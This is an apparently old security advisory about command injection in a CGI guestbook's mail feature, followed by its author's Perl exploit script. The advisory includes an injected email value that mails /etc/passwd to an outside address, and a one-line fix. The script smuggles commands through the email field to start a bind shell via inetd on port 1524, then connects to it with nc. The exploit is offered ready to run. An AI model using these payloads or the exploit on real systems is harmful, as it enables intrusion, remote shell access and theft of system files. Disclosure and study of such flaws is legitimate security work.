======[ sinsecurity.net ]====== ====[ Information ]====== Program Name : Guestbook Program Author : http://www.guestserver.com Test Versions : 4.12,4.09(others believed to be vulnerable) ========================= Overview ======== Guestbook is just your regular old cgi guestbook thats about it. Problem Description =================== By default the guestbook is not vulnerable. The guestbook becomes vulnerable when someone enables the option <-guestbook.mailto_guest-> to 1 in the guestbook.config. When enabled this will send an email to the person after they have signed the guestbook. Enabling this option then makes the guestbook vulnerable to remote command execution because of this line: open (MAIL, "|$mailprogram $FORM{'email'}"); While the author does parse things like ; < > : he forgets to about the pesky |. This is definately not good. Now you could make your email something like this: |cat /etc/passwd | mail imbad@ohno.com and it would send you the passwd :) You are somewhat limited to what you can do with the commands because he parses < > : . Solution ======== Easiest way to fix this problem is to just strip all those | and you should be good. $email =~ s/\|//g; Add that and everything will be just dandy. ======[ enz00@sinsecurity.net ]====== Below is a little exploit I wrote for this vulnerability. It basically first echo's igreslock stream tcp nowait nobody /bin/sh sh -i into /tmp/p00n then it does /usr/sbin/inet /tmp/p00n thus giving you a remote shell as user nobody on port 1524. ========================================================================================================== #!/usr/bin/perl # |Guestbook by Guestserver| # |http://www.guestserver.com| # |enz00@sinsecurity.net| # |http://www.sinsecurity.net| use Socket; if(!@ARGV[1]) { print "-Guestbook by Guestserver sploit- enz00\@sinsecurity.net\n"; print "Usage: \n"; exit; } print "-Guestbook by Guestserver sploit- enz00\@sinsecurity.net\n"; $host = @ARGV[0]; $script = @ARGV[1]; $command = "POST $script HTTP/1.0 Connection: close User-Agent: Mozilla/4.72 [en] (X11; I; Linux 2.2.12-20 i686) Host: $host Accept-Charset: iso-8859-1,*,utf-8 Content-type: application/x-www-form-urlencoded Content-length: 199 name=b0b&SIGN=Sign+it%21&email=b%40b.b%7Cecho+ingreslock+stream+tcp+nowait+nobody+%2Fbin%2Fsh+sh+-i%7Ctee+%2Ftmp%2Fp00n%7C%2Fusr%2Fsbin%2Finetd+%2Ftmp%2Fp00n&homepage=&location=Croatia&message=%3A%29"; $serverIP = inet_aton($host); $serverAddr = sockaddr_in(80, $serverIP); socket(HOST,PF_INET,SOCK_STREAM,getprotobyname('tcp')); if(connect(HOST,$serverAddr)) { print HOST "$command"; close HOST; } print "\nTrying to get your shell.....\n\n"; sleep(5); system("nc $host 1524");